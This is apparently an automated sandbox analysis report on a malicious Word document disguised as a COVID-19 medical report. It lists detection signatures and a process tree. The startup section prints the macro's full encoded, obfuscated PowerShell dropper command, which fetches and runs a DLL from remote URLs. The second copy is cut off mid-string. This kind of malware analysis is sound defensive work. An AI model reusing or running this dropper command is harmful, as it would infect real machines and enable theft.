Loading ...

Play interactive tourEdit tour

Analysis Report GT-9333 Medical report COVID-19.doc

Overview

General Information

Sample Name:GT-9333 Medical report COVID-19.doc
Analysis ID:332936
MD5:a111ce91bd895c36fa2573483ddba7ef
SHA1:d4ef1a6f54d64ec0398fac3a2f3e2694d7ed8cb5
SHA256:f2ebfaec6ca0aeaf9fca020147398f74d7500b6be6259fc2eb4bb2e968e0cafe

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2416 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2532 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJwBmACcAKwAnADQAOQBsACcAKQApAA== MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2344 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2468 cmdline: POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJwArACcAMwBzACcAKwAoACgAJwAyACkAJwApACkAKwAoACgAJwAoAGMAYQBpAHIAbwBjACcAKwAnAGEAJwArACcAZAAnACkAKQArACcALgBjACcAKwAoACgAJwBvAG0AJwArACcASgApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACgAYwAnACkAKQArACgAJwBnAGkAJwArACcALQAnACsAJwBiAGkAbgBKACcAKQArACgAKAAnACkAKAAzAHMAMgApACgAJwArACcAMQBQACcAKwAnAEIAJwArACcAQgAnACkAKQArACgAKAAnAEoAKQAoADMAcwAyACkAJwArACcAKAAnACkAKQArACcAQAAnACsAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACsAJwBzACcAKwAoACgAJwA6AEoAKQAoADMAcwAyACcAKwAnACkAKABKACcAKwAnACkAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwB3ACcAKQApACsAKAAnAHcAdwAuACcAKwAnAGkAJwArACcAcwBhAHQAZQBjAGgAbgBvACcAKQArACcAbAAnACsAKAAnAG8AJwArACcAZwB5AC4AJwApACsAKAAoACcAYwBvAG0ASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACsAJwAoAHQAJwArACcAcgBhAGkAbgBpAG4AZwAnACsAJwBKACkAKAAnACsAJwAzACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABiAEoAJwArACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAQABoAHQAJwArACcAdAAnACkAKQArACcAcAAnACsAJwA6ACcAKwAoACgAJwBKACkAJwApACkAKwAnACgAJwArACcAMwAnACsAKAAoACcAcwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAnACkAJwArACgAKAAnACgAaABvACcAKwAnAHQAZQAnACkAKQArACgAJwBsACcAKwAnAHMAaABpAHYAJwApACsAKAAnAGEAJwArACcAbgBzAGgAJwApACsAKAAoACcALgBjACcAKwAnAG8AbQBKACkAKAAnACkAKQArACcAMwBzACcAKwAoACgAJwAyACkAKABVAHMAJwArACcAZQByAEYAJwArACcAaQAnACkAKQArACgAJwBsACcAKwAnAGUAcwAnACkAKwAnAEoAJwArACgAKAAnACkAKAAnACkAKQArACgAJwAzACcAKwAnAHMAMgAnACkAKwAoACgAJwApACgAJwArACcAOABKACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKAAnACsAJwBAAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAoADMAcwAyACcAKwAnACkAJwArACcAKAAnACsAJwBKACkAJwArACcAKAAzAHMAMgApACcAKwAnACgAbwB3ACcAKwAnAG4AaQB0AGMAbwAnACkAKQArACgAJwBuAHMAJwArACcAaQAnACsAJwBnAG4AbQBlAG4AdAAuAGMAbwBtACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAJwArACcAKQAoACcAKQApACsAKAAnAGYAaQAnACsAJwBsACcAKwAnAGUAcwBKACcAKQArACgAKAAnACkAJwArACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAKAAnACsAJwBiAEoAJwApACkAKwAnACkAJwArACgAKAAnACgAMwBzADIAKQAnACsAJwAoACcAKQApACsAKAAnAEAAaAB0AHQAJwArACcAcABzACcAKQArACgAKAAnADoAJwArACcASgAnACsAJwApACgAMwBzADIAKQAoAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoAGIAJwArACcAMgAnACkAKQArACgAJwBiACcAKwAnAGMAbwBtAC4AYwAnACsAJwBvACcAKwAnAG0ALgBiACcAKQArACcAcgAnACsAKAAoACcASgAnACsAJwApACgAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAcwBpACcAKQApACsAKAAoACcAdABlAEoAKQAnACsAJwAoADMAJwArACcAcwAnACsAJwAyACkAKAAwAEgASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAcwAyACkAKABAACcAKwAnAGgAJwApACkAKwAoACgAJwB0AHQAcAA6AEoAKQAnACsAJwAoACcAKwAnADMAcwAyACcAKQApACsAKAAoACcAKQAoACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACcAKwAnACgAdAAnACsAJwByAGEAbgBzACcAKwAnAGYAZQAnACkAKQArACgAJwByAHMAdQAnACsAJwB2AGEAJwApACsAKAAoACcAbgAnACsAJwAuAGMAbwBtACcAKwAnAEoAKQAnACkAKQArACgAKAAnACgAMwBzACcAKwAnADIAKQAoAHcAcAAtAGEAJwArACcAZAAnACsAJwBtACcAKQApACsAJwBpACcAKwAoACgAJwBuACcAKwAnAEoAKQAoADMAcwAyACcAKwAnACkAKABPACcAKwAnAFYAbAAnACkAKQArACcASgAnACsAKAAoACcAKQAoACcAKQApACsAKAAoACcAMwBzADIAJwArACcAKQAoACcAKQApACsAJwBAACcAKwAnAGgAdAAnACsAKAAnAHQAJwArACcAcABzADoAJwApACsAKAAoACcASgAnACsAJwApACcAKwAnACgAMwBzADIAKQAoAEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAcABoAHkAcwAnACkAKQArACcAaQAnACsAKAAoACcAbwAtACcAKwAnAHMAdgBkAGgALgAnACsAJwBjAGgASgApACgAMwAnACkAKQArACgAKAAnAHMAMgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwB3AHAALQBhAGQAJwApACkAKwAoACgAJwBtAGkAbgBKACkAKAAnACsAJwAzACcAKwAnAHMAJwArACcAMgApACgAawAnACsAJwBLAEoAKQAoADMAJwApACkAKwAnAHMAJwArACgAKAAnADIAKQAnACkAKQArACcAKAAnACkAKQAuACIAcgBlAFAAbABgAEEAYwBFACIAKAAoACgAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACgAKAAnAHMAMgApACcAKwAnACgAJwApACkAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACgAJwBoAHcAJwArACcAZQAnACkAKQBbADAAXQApAC4AIgBTAGAAUABMAEkAVAAiACgAJABUAGcAMwB5AHAAdgAwACAAKwAgACQASAAyAHEANgBxAHAAegAgACsAIAAkAEEAcABqADAAdwBtAG8AKQA7ACQAQwBxAG8AdwBiADQAZAA9ACgAKAAnAFgANgAnACsAJwB1AGgAJwApACsAKAAnADAANQAnACsAJwB5ACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIAHcAcQBmAGUAbwBuACAAaQBuACAAJABOAGsAcQBfAGcAMABxACAAfAAgAFMATwBgAFIAYABUAC0AbwBiAGAASgBFAEMAdAAgAHsARwBlAGAAVAAtAFIAYQBgAE4ARABvAG0AfQApAHsAdAByAHkAewAkAFYAMABfAHIAaQAwAG4ALgAiAGQAbwB3AGAATgBsAE8AYABBAEQAYABGAGkATABlACIAKAAkAEgAdwBxAGYAZQBvAG4ALAAgACQAWgByAHcAagBoADkAawApADsAJABDAHcAawAxAG8AOABvAD0AKAAoACcAQgAnACsAJwA2AHgAMgBvACcAKQArACcAdwB0ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACAAJABaAHIAdwBqAGgAOQBrACkALgAiAEwAZQBuAGcAYABUAGgAIgAgAC0AZwBlACAANAA0ADAANwA3ACkAIAB7ACYAKAAnAHIAdQAnACsAJwBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAcgB3AGoAaAA5AGsALAAnACMAMQAnAC4AIgBUAGAAbwBzAHQAYABSAGkAbgBHACIAKAApADsAJABDAGMAcwBrAGkAeAAwAD0AKAAnAFkAJwArACcAMwB2ACcAKwAoACcAYQAyAHQAJwArACcAZwAnACkAKQA7AGIAcgBlAGEAawA7ACQASQA3AGEAYgB6ADYAZwA9ACgAJwBMACcAKwAoACcAdQBoACcAKwAnAGYAbgBxAGsAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFcAXwA2ADIAZgB5ADYAPQAoACcASQAnACsAJwB4AHEAJwArACgAJ